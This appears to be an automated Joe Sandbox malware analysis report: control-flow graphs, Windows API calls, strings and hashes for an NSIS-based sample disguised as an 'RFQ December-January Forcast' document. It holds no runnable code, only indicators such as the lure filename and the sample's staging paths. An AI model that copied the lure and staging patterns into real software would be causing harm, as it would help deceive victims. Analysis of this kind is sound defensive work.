                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00403ECF
                                                                                                            • ShowWindow.USER32(00000000,?), ref: 00403EF0
                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F02
                                                                                                            • EnableWindow.USER32(?,?), ref: 00403F1D
                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F33
                                                                                                            • EnableMenuItem.USER32(00000000), ref: 00403F3A
                                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F52
                                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F65
                                                                                                            • lstrlenW.KERNEL32(0042D268,?,0042D268,00433F00), ref: 00403F8E
                                                                                                            • SetWindowTextW.USER32(?,0042D268), ref: 00403FA2
                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 004040D6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 3282139019-0
                                                                                                            • Opcode ID: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
                                                                                                            • Instruction ID: ea0d75974b1de0ff06d17ebe4cf6f8c3df4269cbbec1c2e45b889e3be151f72f
                                                                                                            • Opcode Fuzzy Hash: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
                                                                                                            • Instruction Fuzzy Hash: 51C1AEB1604300ABDB206F61ED85E2B7AA8EB94706F50053EF641B61F0CB7999529B2D

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 360 40389e-4038b6 call 40642b 363 4038b8-4038c3 GetUserDefaultUILanguage call 405f9c 360->363 364 4038ca-403901 call 405f22 360->364 367 4038c8 363->367 370 403903-403914 call 405f22 364->370 371 403919-40391f lstrcatW 364->371 369 403924-40394d call 403b74 call 405b11 367->369 377 403953-403958 369->377 378 4039df-4039e7 call 405b11 369->378 370->371 371->369 377->378 379 40395e-403986 call 405f22 377->379 384 4039f5-403a1a LoadImageW 378->384 385 4039e9-4039f0 call 406077 378->385 379->378 386 403988-40398c 379->386 388 403a9b-403aa3 call 40140b 384->388 389 403a1c-403a4c RegisterClassW 384->389 385->384 390 40399e-4039aa lstrlenW 386->390 391 40398e-40399b call 405a36 386->391 402 403aa5-403aa8 388->402 403 403aad-403ab8 call 403b74 388->403 392 403a52-403a96 SystemParametersInfoW CreateWindowExW 389->392 393 403b6a 389->393 397 4039d2-4039da call 405a09 call 406055 390->397 398 4039ac-4039ba lstrcmpiW 390->398 391->390 392->388 396 403b6c-403b73 393->396 397->378 398->397 401 4039bc-4039c6 GetFileAttributesW 398->401 405 4039c8-4039ca 401->405 406 4039cc-4039cd call 405a55 401->406 402->396 412 403b41-403b49 call 405287 403->412 413 403abe-403ad8 ShowWindow call 4063bf 403->413 405->397 405->406 406->397 420 403b63-403b65 call 40140b 412->420 421 403b4b-403b51 412->421 418 403ae4-403af6 GetClassInfoW 413->418 419 403ada-403adf call 4063bf 413->419 425 403af8-403b08 GetClassInfoW RegisterClassW 418->425 426 403b0e-403b31 DialogBoxParamW call 40140b 418->426 419->418 420->393 421->402 422 403b57-403b5e call 40140b 421->422 422->402 425->426 430 403b36-403b3f call 4037ee 426->430 430->396
                                                                                                            APIs
                                                                                                              • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                              • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                            • GetUserDefaultUILanguage.KERNELBASE(00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe"), ref: 004038B8
                                                                                                              • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                            • lstrcatW.KERNEL32(1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe"), ref: 0040391F
                                                                                                            • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420), ref: 0040399F
                                                                                                            • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 004039B2
                                                                                                            • GetFileAttributesW.KERNEL32(Call), ref: 004039BD
                                                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving), ref: 00403A06
                                                                                                            • RegisterClassW.USER32(00433EA0), ref: 00403A43
                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A5B
                                                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A90
                                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403AC6
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403AF2
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403AFF
                                                                                                            • RegisterClassW.USER32(00433EA0), ref: 00403B08
                                                                                                            • DialogBoxParamW.USER32(?,00000000,00403C41,00000000), ref: 00403B27
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: "C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                            • API String ID: 606308-3240458059
                                                                                                            • Opcode ID: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
                                                                                                            • Instruction ID: 3415ad5ee5f1eed3d2c0e447cb4c4d8a0153f3b0974deb3f023f39c7f2583bdf
                                                                                                            • Opcode Fuzzy Hash: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
                                                                                                            • Instruction Fuzzy Hash: A361CA706406006FD320AF66AD46F2B3A6CEB8474AF40553FF941B22E2DB7D5D41CA2D

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 433 402dee-402e3c GetTickCount GetModuleFileNameW call 405c2a 436 402e48-402e76 call 406055 call 405a55 call 406055 GetFileSize 433->436 437 402e3e-402e43 433->437 445 402f63-402f71 call 402d8a 436->445 446 402e7c 436->446 438 403020-403024 437->438 452 402f73-402f76 445->452 453 402fc6-402fcb 445->453 448 402e81-402e98 446->448 450 402e9a 448->450 451 402e9c-402ea5 call 403242 448->451 450->451 458 402eab-402eb2 451->458 459 402fcd-402fd5 call 402d8a 451->459 456 402f78-402f90 call 403258 call 403242 452->456 457 402f9a-402fc4 GlobalAlloc call 403258 call 403027 452->457 453->438 456->453 480 402f92-402f98 456->480 457->453 484 402fd7-402fe8 457->484 462 402eb4-402ec8 call 405be5 458->462 463 402f2e-402f32 458->463 459->453 471 402f3c-402f42 462->471 482 402eca-402ed1 462->482 470 402f34-402f3b call 402d8a 463->470 463->471 470->471 475 402f51-402f5b 471->475 476 402f44-402f4e call 4064dc 471->476 475->448 483 402f61 475->483 476->475 480->453 480->457 482->471 486 402ed3-402eda 482->486 483->445 487 402ff0-402ff5 484->487 488 402fea 484->488 486->471 489 402edc-402ee3 486->489 490 402ff6-402ffc 487->490 488->487 489->471 491 402ee5-402eec 489->491 490->490 492 402ffe-403019 SetFilePointer call 405be5 490->492 491->471 494 402eee-402f0e 491->494 495 40301e 492->495 494->453 496 402f14-402f18 494->496 495->438 497 402f20-402f28 496->497 498 402f1a-402f1e 496->498 497->471 499 402f2a-402f2c 497->499 498->483 498->497 499->471
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe,00000400,?,?,00000000,0040353A,?), ref: 00402E1B
                                                                                                              • Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                              • Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe,C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00402E67
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                            • String ID: "C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe"$(*B$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                            • API String ID: 4283519449-2695421404
                                                                                                            • Opcode ID: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
                                                                                                            • Instruction ID: 7d4f9fc7c678da67c97c1a1890296b71ec8e814f853b941ab64c238268a70fe9
                                                                                                            • Opcode Fuzzy Hash: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
                                                                                                            • Instruction Fuzzy Hash: AF51F731904205ABDB209F61DE89B9F7BB8EB44394F14403BF904B62C1C7B89D409BAD

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 626 401767-40178c call 402bbf call 405a80 631 401796-4017a8 call 406055 call 405a09 lstrcatW 626->631 632 40178e-401794 call 406055 626->632 638 4017ad-4017ae call 4062e9 631->638 632->638 641 4017b3-4017b7 638->641 642 4017b9-4017c3 call 406398 641->642 643 4017ea-4017ed 641->643 650 4017d5-4017e7 642->650 651 4017c5-4017d3 CompareFileTime 642->651 645 4017f5-401811 call 405c2a 643->645 646 4017ef-4017f0 call 405c05 643->646 653 401813-401816 645->653 654 401885-4018ae call 4051b4 call 403027 645->654 646->645 650->643 651->650 655 401867-401871 call 4051b4 653->655 656 401818-401856 call 406055 * 2 call 406077 call 406055 call 40579a 653->656 668 4018b0-4018b4 654->668 669 4018b6-4018c2 SetFileTime 654->669 666 40187a-401880 655->666 656->641 689 40185c-40185d 656->689 670 402a55 666->670 668->669 672 4018c8-4018d3 CloseHandle 668->672 669->672 676 402a57-402a5b 670->676 674 4018d9-4018dc 672->674 675 402a4c-402a4f 672->675 678 4018f1-4018f4 call 406077 674->678 679 4018de-4018ef call 406077 lstrcatW 674->679 675->670 683 4018f9-40228d call 40579a 678->683 679->683 683->676 689->666 691 40185f-401860 689->691 691->655
                                                                                                            APIs
                                                                                                            • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Khans,?,?,00000031), ref: 004017A8
                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Khans,?,?,00000031), ref: 004017CD
                                                                                                              • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                              • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                              • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                              • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,74DF23A0), ref: 0040520F
                                                                                                              • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                              • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                              • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                              • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                            • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Khans$C:\Users\user\AppData\Local\Temp\nskEAE7.tmp$C:\Users\user\AppData\Local\Temp\nskEAE7.tmp\System.dll$Call
                                                                                                            • API String ID: 1941528284-275066272
                                                                                                            • Opcode ID: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
                                                                                                            • Instruction ID: 02e4f6238df89927c362e8fae2a75ca1a565c16d749b69ec27d3a85cbadddcd8
                                                                                                            • Opcode Fuzzy Hash: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
                                                                                                            • Instruction Fuzzy Hash: 0941B631900515BACF11BFB5CC45EAF7679EF05328B24423BF522B10E1DB3C86519A6D

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 692 403027-40303e 693 403040 692->693 694 403047-403050 692->694 693->694 695 403052 694->695 696 403059-40305e 694->696 695->696 697 403060-403069 call 403258 696->697 698 40306e-40307b call 403242 696->698 697->698 702 403230 698->702 703 403081-403085 698->703 704 403232-403233 702->704 705 4031db-4031dd 703->705 706 40308b-4030d4 GetTickCount 703->706 709 40323b-40323f 704->709 707 40321d-403220 705->707 708 4031df-4031e2 705->708 710 403238 706->710 711 4030da-4030e2 706->711 712 403222 707->712 713 403225-40322e call 403242 707->713 708->710 714 4031e4 708->714 710->709 715 4030e4 711->715 716 4030e7-4030f5 call 403242 711->716 712->713 713->702 725 403235 713->725 718 4031e7-4031ed 714->718 715->716 716->702 724 4030fb-403104 716->724 721 4031f1-4031ff call 403242 718->721 722 4031ef 718->722 721->702 730 403201-40320d call 405cdc 721->730 722->721 727 40310a-40312a call 40654a 724->727 725->710 734 403130-403143 GetTickCount 727->734 735 4031d3-4031d5 727->735 736 4031d7-4031d9 730->736 737 40320f-403219 730->737 738 403145-40314d 734->738 739 40318e-403190 734->739 735->704 736->704 737->718 740 40321b 737->740 741 403155-40318b MulDiv wsprintfW call 4051b4 738->741 742 40314f-403153 738->742 743 403192-403196 739->743 744 4031c7-4031cb 739->744 740->710 741->739 742->739 742->741 747 403198-40319f call 405cdc 743->747 748 4031ad-4031b8 743->748 744->711 745 4031d1 744->745 745->710 753 4031a4-4031a6 747->753 749 4031bb-4031bf 748->749 749->727 752 4031c5 749->752 752->710 753->736 754 4031a8-4031ab 753->754 754->749
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountTick$wsprintf
                                                                                                            • String ID: jA$ jA$... %d%%
                                                                                                            • API String ID: 551687249-2167919867
                                                                                                            • Opcode ID: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
                                                                                                            • Instruction ID: 9abceb1f43df10d1a821086e1d45a58eca4464abfa5f2a46825b956852eb5d51
                                                                                                            • Opcode Fuzzy Hash: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
                                                                                                            • Instruction Fuzzy Hash: AF517C71901259EBDB10CF65DA44BAE7BB8AF05766F10417FF811B62C0C7789E40CBAA

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 755 4025e5-4025fa call 402ba2 758 402600-402607 755->758 759 402a4c-402a4f 755->759 760 402609 758->760 761 40260c-40260f 758->761 762 402a55-402a5b 759->762 760->761 763 402773-40277b 761->763 764 402615-402624 call 405fb5 761->764 763->759 764->763 768 40262a 764->768 769 402630-402634 768->769 770 4026c9-4026cc 769->770 771 40263a-402655 ReadFile 769->771 772 4026e4-4026f4 call 405cad 770->772 773 4026ce-4026d1 770->773 771->763 774 40265b-402660 771->774 772->763 784 4026f6 772->784 773->772 775 4026d3-4026de call 405d0b 773->775 774->763 777 402666-402674 774->777 775->763 775->772 780 40267a-40268c MultiByteToWideChar 777->780 781 40272f-40273b call 405f9c 777->781 780->784 785 40268e-402691 780->785 781->762 788 4026f9-4026fc 784->788 786 402693-40269e 785->786 786->788 789 4026a0-4026c5 SetFilePointer MultiByteToWideChar 786->789 788->781 790 4026fe-402703 788->790 789->786 791 4026c7 789->791 792 402740-402744 790->792 793 402705-40270a 790->793 791->784 794 402761-40276d SetFilePointer 792->794 795 402746-40274a 792->795 793->792 796 40270c-40271f 793->796 794->763 798 402752-40275f 795->798 799 40274c-402750 795->799 796->763 797 402721-402727 796->797 797->769 800 40272d 797->800 798->763 799->794 799->798 800->763
                                                                                                            APIs
                                                                                                            • ReadFile.KERNELBASE(?,?,?,?), ref: 0040264D
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                                                            • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                                                              • Part of subcall function 00405D0B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D21
                                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                            • String ID: 9
                                                                                                            • API String ID: 163830602-2366072709
                                                                                                            • Opcode ID: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                            • Instruction ID: c11c119823ef092d14edb4d445d1eebecf1e4ba29e3308019af08aa6c5ad61e3
                                                                                                            • Opcode Fuzzy Hash: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                            • Instruction Fuzzy Hash: 43510874D00219AADF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99D42DB69

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 801 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 808 4023c7-4023cf 801->808 809 402a4c-402a5b 801->809 810 4023d1-4023de call 402bbf lstrlenW 808->810 811 4023e2-4023e5 808->811 810->811 814 4023f5-4023f8 811->814 815 4023e7-4023f4 call 402ba2 811->815 819 402409-40241d RegSetValueExW 814->819 820 4023fa-402404 call 403027 814->820 815->814 823 402422-4024fc RegCloseKey 819->823 824 40241f 819->824 820->819 823->809 826 40281e-402825 823->826 824->823 826->809
                                                                                                            APIs
                                                                                                            • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nskEAE7.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                            • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nskEAE7.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nskEAE7.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateValuelstrlen
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nskEAE7.tmp
                                                                                                            • API String ID: 1356686001-1240851850
                                                                                                            • Opcode ID: 16ccbc1a4839035df8dee6c69b1955b51d84c24cc9eb413e0f302de5cc057626
